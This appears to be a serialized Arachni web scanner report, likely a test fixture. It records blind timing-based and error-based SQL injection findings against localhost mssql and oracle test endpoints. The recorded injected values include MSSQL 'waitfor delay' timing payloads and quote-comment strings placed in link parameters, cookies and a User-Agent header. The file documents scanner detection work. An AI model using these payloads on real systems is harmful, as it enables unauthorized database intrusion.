:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ==
:skip_orig: true
:injected_orig: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ==
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ;waitfor delay '0:0:16'--
:follow_location: true
:injected: ;waitfor delay '0:0:16'--
:combo:
!binary "aW5wdXQ=": ;waitfor delay '0:0:16'--
:action: http://localhost:12482/mssql/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/mssql/link/straight?input=default
injected: ;waitfor delay '0:0:16'--
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: input
url: http://localhost:12482/mssql/link/append?input=default
elem: link
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ==
:skip_orig: true
:injected_orig: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ==
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default;waitfor delay '0:0:16'--
:follow_location: true
:injected: default;waitfor delay '0:0:16'--
:combo:
!binary "aW5wdXQ=": default;waitfor delay '0:0:16'--
:action: http://localhost:12482/mssql/link/append?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:12482/mssql/link/append?input=default
injected: default;waitfor delay '0:0:16'--
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: cookie
url: http://localhost:12482/mssql/cookie/straight
elem: cookie
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ==
:skip_orig: true
:injected_orig: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ==
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ;waitfor delay '0:0:16'--
:injected: ;waitfor delay '0:0:16'--
:combo:
!binary "Y29va2ll": ;waitfor delay '0:0:16'--
:action: http://localhost:12482/mssql/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:12482/mssql/cookie/straight
injected: ;waitfor delay '0:0:16'--
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=%3Bwaitfor+delay+'0:0:16'--;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: cookie2
url: http://localhost:12482/mssql/cookie/append
elem: cookie
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ==
:skip_orig: true
:injected_orig: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ==
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value;waitfor delay '0:0:16'--
:injected: cookie value;waitfor delay '0:0:16'--
:combo:
!binary "Y29va2llMg==": cookie value;waitfor delay '0:0:16'--
:action: http://localhost:12482/mssql/cookie/append
:silent: true
:regexp: ''
var: cookie2
url: http://localhost:12482/mssql/cookie/append
injected: cookie value;waitfor delay '0:0:16'--
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value%3Bwaitfor+delay+'0:0:16'--
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: User-Agent
url: http://localhost:12482/mssql/header/append
elem: header
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ==
:skip_orig: true
:injected_orig: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ==
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user;waitfor delay '0:0:16'--
:injected: arachni_user;waitfor delay '0:0:16'--
:combo:
User-Agent: arachni_user;waitfor delay '0:0:16'--
:action: http://localhost:12482/mssql/header/append
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:12482/mssql/header/append
injected: arachni_user;waitfor delay '0:0:16'--
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user;waitfor delay '0:0:16'--
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
var: User-Agent
url: http://localhost:12482/mssql/header/straight
elem: header
method: GET
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue was
discovered using a timing attack; timing attacks\n can result in false positives
in cases where the server takes\n an abnormally long time to respond.\n Either
case, these issues will require further investigation\n even if they are false
positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:timeout: 11200.0
:timeout_divider: 1000
:timing_string: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDpfX1RJTUVfXyctLQ==
:skip_orig: true
:injected_orig: !binary |-
O3dhaXRmb3IgZGVsYXkgJzA6MDoxNictLQ==
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ;waitfor delay '0:0:16'--
:injected: ;waitfor delay '0:0:16'--
:combo:
User-Agent: ;waitfor delay '0:0:16'--
:action: http://localhost:12482/mssql/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:12482/mssql/header/straight
injected: ;waitfor delay '0:0:16'--
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ;waitfor delay '0:0:16'--
Cookie: cookie=cookie+value;cookie2=cookie+value
response: {}
name: Blind SQL Injection (timing attack)
description: ! "SQL code can be injected into the web application\n even though
it may not be obvious due to suppression of error messages.\n (This issue
was discovered using a timing attack; timing attacks\n can result in false
positives in cases where the server takes\n an abnormally long time to respond.\n
\ Either case, these issues will require further investigation\n even if
they are false positives.)"
tags:
- sql
- blind
- timing
- injection
- database
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "Suppression of error messages leads to\n security through
obscurity which is not a good practise.\n The web application needs to enforce
stronger validation\n on user inputs."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: Blind SQL injection (timing attack)
variations: []
internal_modname: BlindTimingSQLInjection
internal_modname: BlindTimingSQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/oracle/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:java\.sql\.SQLException)
:match: java.sql.SQLException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/oracle/form/flip
:verification:
:id: java.sql.SQLException
var: Parameter flip
url: http://localhost:7362/oracle/form/flip
injected: ''
id: java.sql.SQLException
regexp: (?i-mx:java\.sql\.SQLException)
regexp_match: java.sql.SQLException
elem: form
remarks: {}
method: GET
response: ! '["(PLS|ORA)-[0-9][0-9][0-9][0-9]\njava.sql.SQLException\nOracle error\nOracle
stuff Driver\nWarning stuff oci_ stuff\nWarning stuff ora_ stuff\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTUx
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo0OCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/oracle/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:java\.sql\.SQLException)
:match: java.sql.SQLException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/oracle/form/append
:verification:
:id: java.sql.SQLException
var: input
url: http://localhost:7362/oracle/form/append
injected: default'`--
id: java.sql.SQLException
regexp: (?i-mx:java\.sql\.SQLException)
regexp_match: java.sql.SQLException
elem: form
remarks: {}
method: GET
response: ! '(PLS|ORA)-[0-9][0-9][0-9][0-9]
java.sql.SQLException
Oracle error
Oracle stuff Driver
Warning stuff oci_ stuff
Warning stuff ora_ stuff
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTM2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo0OCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/oracle/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:java\.sql\.SQLException)
:match: java.sql.SQLException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/oracle/link/flip?input=default
:verification:
:id: java.sql.SQLException
var: Parameter flip
url: http://localhost:7362/oracle/link/flip?input=default
injected: ''
id: java.sql.SQLException
regexp: (?i-mx:java\.sql\.SQLException)
regexp_match: java.sql.SQLException
elem: link
remarks: {}
method: GET
response: ! '["(PLS|ORA)-[0-9][0-9][0-9][0-9]\njava.sql.SQLException\nOracle error\nOracle
stuff Driver\nWarning stuff oci_ stuff\nWarning stuff ora_ stuff\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTUx
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1MCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/oracle/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:java\.sql\.SQLException)
:match: java.sql.SQLException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/oracle/link/append?input=default
:verification:
:id: java.sql.SQLException
var: input
url: http://localhost:7362/oracle/link/append?input=default
injected: default'`--
id: java.sql.SQLException
regexp: (?i-mx:java\.sql\.SQLException)
regexp_match: java.sql.SQLException
elem: link
remarks: {}
method: GET
